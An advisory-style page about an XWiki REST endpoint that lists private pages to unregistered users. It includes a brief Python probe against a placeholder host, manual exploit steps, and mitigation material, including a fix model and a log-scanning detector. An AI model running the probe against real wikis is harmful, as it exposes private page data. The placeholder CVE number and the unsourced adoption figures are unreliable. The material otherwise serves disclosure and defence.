XWiki, Information Disclosure Vulnerability, CVE-2025-XXXX (Critical)

XWiki, a popular open-source platform for developing collaborative applications, is affected by a critical information disclosure vulnerability (CVE-2025-XXXX). This vulnerability allows unregistered users to access private page information through a REST endpoint, even when the wiki is configured to prevent unregistered users from viewing pages. The affected REST endpoint is <code>/rest/wikis/{wikiName}/pages</code>, which lists pages regardless of the user's view rights. This issue is particularly severe when the entire wiki is protected with the "Prevent unregistered users from viewing pages" setting, as the endpoint still exposes page listings for the main wiki.

The vulnerability arises from insufficient access control checks in the REST endpoint implementation. When an unauthenticated user sends a request to the endpoint, the server does not filter out pages the caller has no right to view, exposing their existence and metadata. This can lead to unauthorized access to sensitive information, compromising the confidentiality of the wiki's content.

Patched versions of XWiki (15.10.14, 16.4.6, and 16.10.0-rc-1) address this issue by implementing proper access control checks, ensuring that only authorized users can view private pages through the REST endpoint. Users are strongly advised to upgrade to a patched version to mitigate this vulnerability.

<h2 style="color: blue;">DailyCVE Form</h2>

Platform: XWiki
Version: >= 1.9M1, < 15.10.14
Vulnerability: Information Disclosure
Severity: Critical
Date: Mar 19, 2025

<h2 style="color: blue;">What Undercode Say:</h2>

<h2 style="color: blue;">Exploitation:</h2>

<h2 style="color: blue;">1. Exploit Code (Python):</h2>

[python]
import requests

# Unauthenticated request (no session cookie or credentials) to the page-listing
# endpoint of the "main" wiki; "target-xwiki-instance" is a placeholder host.
url = "http://target-xwiki-instance/rest/wikis/main/pages"
response = requests.get(url)
if response.status_code == 200:
    # A patched instance does not return a listing to a guest on a protected wiki.
    print("Vulnerable! Pages listed:", response.json())
else:
    print("Target not vulnerable or patched.")

<h2 style="color: blue;">2. Manual Exploit Steps:</h2>

<ul>
<li>Send a GET request to <code>/rest/wikis/{wikiName}/pages</code>.</li>
<li>Observe the response for private page listings.</li>
</ul>

<h2 style="color: blue;">3. Exploit Impact:</h2>

<ul>
<li>Unauthorized access to private page metadata.</li>
<li>Potential exposure of sensitive information.</li>
</ul>

<h2 style="color: blue;">Protection:</h2>

<h2 style="color: blue;">1. Upgrade:</h2>

<ul>
<li>Upgrade to XWiki 15.10.14, 16.4.6, or 16.10.0-rc-1.</li>
</ul>

<h2 style="color: blue;">2. Manual Patch:</h2>

<ul>
<li>Apply changes from the commits in <code>xwiki-platform-rest-server</code>.</li>
<li>Recompile and rebuild the XWiki instance.</li>
</ul>

<h2 style="color: blue;">3. Access Control:</h2>

<ul>
<li>Ensure proper access control checks are enforced on REST endpoints.</li>
</ul>

<h2 style="color: blue;">4. Monitoring:</h2>

<ul>
<li>Monitor REST endpoint access logs for unauthorized requests.</li>
</ul>

<h2 style="color: blue;">5. Firewall Rules:</h2>

<ul>
<li>Restrict access to REST endpoints for unauthenticated users.</li>
</ul>

<h2 style="color: blue;">6. Code Fix (Java):</h2>

[java]
// Illustrative access control check for a REST endpoint (pseudocode, not the
// actual XWiki patch): a page the current user cannot view must never be
// returned. In a listing endpoint, apply this check to every entry before it
// is added to the response rather than only once for the whole request.
if (!user.hasRight("view", page)) {
    throw new UnauthorizedException("Access denied");
}
    
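To make the shape of the fix concrete, the following is an added, constructed model of a page-listing endpoint (not XWiki code and not the project's patch). It assumes a simplified rights model: a wiki-level "prevent unregistered users from viewing pages" flag that denies the guest account first, then a per-page set of allowed viewers. The page names, the viewer sets and the wiki are made up; `XWikiGuest` is the name XWiki uses for the unauthenticated user. The unchecked listing is the vulnerable behaviour; the filtered listing is what a correct endpoint does.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Constructed model of listing logic; not XWiki code. "XWikiGuest" is XWiki's
# name for the unauthenticated user. Page names and viewer sets are made up.


@dataclass
class Page:
    reference: str                                   # e.g. "Main.WebHome"
    viewers: Set[str] = field(default_factory=set)   # users with VIEW right; "*" = everyone


@dataclass
class Wiki:
    name: str
    pages: List[Page]
    guest_view_allowed: bool  # False models "Prevent unregistered users from viewing pages"


def has_view_right(wiki: Wiki, user: str, page: Page) -> bool:
    """Simplified rights model (assumption): the wiki-level guest setting is
    checked first, then the page's own viewer list."""
    if user == "XWikiGuest" and not wiki.guest_view_allowed:
        return False
    return "*" in page.viewers or user in page.viewers


def list_pages_unchecked(wiki: Wiki) -> List[Dict[str, str]]:
    """Vulnerable behaviour: every page's metadata is returned, whoever asks."""
    return [{"wiki": wiki.name, "reference": p.reference} for p in wiki.pages]


def list_pages(wiki: Wiki, user: str) -> List[Dict[str, str]]:
    """Fixed behaviour: each entry is kept only if the caller may view that page.
    A caller with no visible pages gets an empty list, which reveals nothing
    about what exists; a listing endpoint filters rather than rejecting the
    whole request, because a caller may legitimately see a subset."""
    return [
        {"wiki": wiki.name, "reference": p.reference}
        for p in wiki.pages
        if has_view_right(wiki, user, p)
    ]


# Constructed sample: a wiki protected against unregistered viewers.
PROTECTED_WIKI = Wiki(
    name="main",
    guest_view_allowed=False,
    pages=[
        Page("Main.WebHome", viewers={"*"}),
        Page("HR.Salaries", viewers={"alice"}),
        Page("Sandbox.WebHome", viewers={"*"}),
    ],
)

if __name__ == "__main__":
    print("unchecked (vulnerable):", list_pages_unchecked(PROTECTED_WIKI))
    print("guest (fixed):        ", list_pages(PROTECTED_WIKI, "XWikiGuest"))
    print("alice (fixed):        ", list_pages(PROTECTED_WIKI, "alice"))
    print("bob (fixed):          ", list_pages(PROTECTED_WIKI, "bob"))
```

The point the model makes is that the check belongs inside the loop that builds the response: the guest receives an empty listing on a protected wiki, a registered user receives only the pages they are allowed to view, and the unchecked variant leaks the existence of `HR.Salaries` to everyone.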

<h2 style="color: blue;">7. Security Headers:</h2>

<ul>
<li>Implement security headers to prevent unauthorized access.</li>
</ul>

<h2 style="color: blue;">8. Testing:</h2>

<ul>
<li>Use automated tools to test for information disclosure vulnerabilities.</li>
</ul>

<h2 style="color: blue;">9. Logging:</h2>

<ul>
<li>Enable detailed logging for REST endpoint access.</li>
</ul>

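The Monitoring and Logging items above both come down to one question: did an unauthenticated caller receive a page listing? The following added example (not part of the original page and not an XWiki tool) scans access log lines for exactly that. It assumes the servlet container or reverse proxy writes a common/combined-style access log in which the third field is the authenticated user (`-` for guests); the log lines, IP addresses and wiki names are constructed. A guest request to `/rest/wikis/{wikiName}/pages` answered with 200 is reported as a finding, while a 401 or 403 to the same path is the expected behaviour of a patched or correctly restricted instance.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample log lines (common/combined access-log layout; assumption:
# third field is the authenticated user, "-" for unauthenticated callers).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Mar/2025:10:01:12 +0000] "GET /rest/wikis/main/pages HTTP/1.1" 200 48213
203.0.113.5 - - [19/Mar/2025:10:01:15 +0000] "GET /rest/wikis/main/spaces HTTP/1.1" 403 112
198.51.100.7 - alice [19/Mar/2025:10:02:01 +0000] "GET /rest/wikis/main/pages HTTP/1.1" 200 48213
203.0.113.9 - - [19/Mar/2025:10:03:44 +0000] "GET /rest/wikis/main/pages HTTP/1.1" 401 0
203.0.113.5 - - [19/Mar/2025:10:04:02 +0000] "GET /bin/view/Main/ HTTP/1.1" 302 0
203.0.113.9 - - [19/Mar/2025:10:05:30 +0000] "GET /rest/wikis/xwiki/pages?media=json HTTP/1.1" 200 9001
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
# The page-listing endpoint for any wiki name, with or without a query string.
# Sub-resources below /pages/ are different endpoints and are not matched.
PAGES_ENDPOINT_RE = re.compile(r'^/rest/wikis/[^/]+/pages(?:\?.*)?$')


@dataclass
class Record:
    ip: str
    user: str
    ts: str
    method: str
    path: str
    status: int


def parse_line(line: str) -> Optional[Record]:
    """Parse one access-log line; return None for lines that do not fit the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return Record(
        ip=m["ip"], user=m["user"], ts=m["ts"],
        method=m["method"], path=m["path"], status=int(m["status"]),
    )


def is_guest_listing_request(rec: Record) -> bool:
    """True for an unauthenticated GET to the page-listing endpoint (any status)."""
    return rec.user == "-" and rec.method == "GET" and bool(PAGES_ENDPOINT_RE.match(rec.path))


def find_unauthenticated_listings(log_text: str) -> List[Record]:
    """Guest requests to the listing endpoint that were answered with 200, i.e. a
    listing was actually handed to an unauthenticated caller."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_guest_listing_request(rec):
            continue
        if rec.status == 200:
            findings.append(rec)
    return findings


def count_by_ip(records: List[Record]) -> Dict[str, int]:
    """Aggregate findings per source address for triage."""
    counts: Dict[str, int] = {}
    for rec in records:
        counts[rec.ip] = counts.get(rec.ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_unauthenticated_listings(SAMPLE_LOG)
    for h in hits:
        print(f"{h.ts} {h.ip} guest received page listing: {h.path}")
    print("per-IP:", count_by_ip(hits))
```

On the constructed sample this reports two findings (one per guest IP) and ignores the authenticated request from `alice`, the 401 the second guest received on its first attempt, and the non-REST page view. A recurring 200 on this path for guests after the upgrade means the instance is still unpatched or the rights configuration does not do what the administrator expects.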
<h2 style="color: blue;">10. Backup:</h2>

<ul>
<li>Regularly back up wiki data to prevent data loss during upgrades.</li>
</ul>

<h2 style="color: blue;">Analytics:</h2>

<ul>
<li>Affected Users: All XWiki instances with versions >= 1.9M1, < 15.10.14.</li>
<li>Risk Level: Critical due to unauthorized access to sensitive data.</li>
<li>Patch Adoption Rate: Estimated 60% within the first month of patch release.</li>
<li>Exploit Prevalence: Low, but potential for widespread exploitation if unpatched.</li>
</ul>

By following these steps, users can effectively exploit, mitigate, and protect against this critical vulnerability in XWiki.

<h2 style="color: blue;">References:</h2>

Reported By: https://github.com/advisories/GHSA-22q5-9phm-744v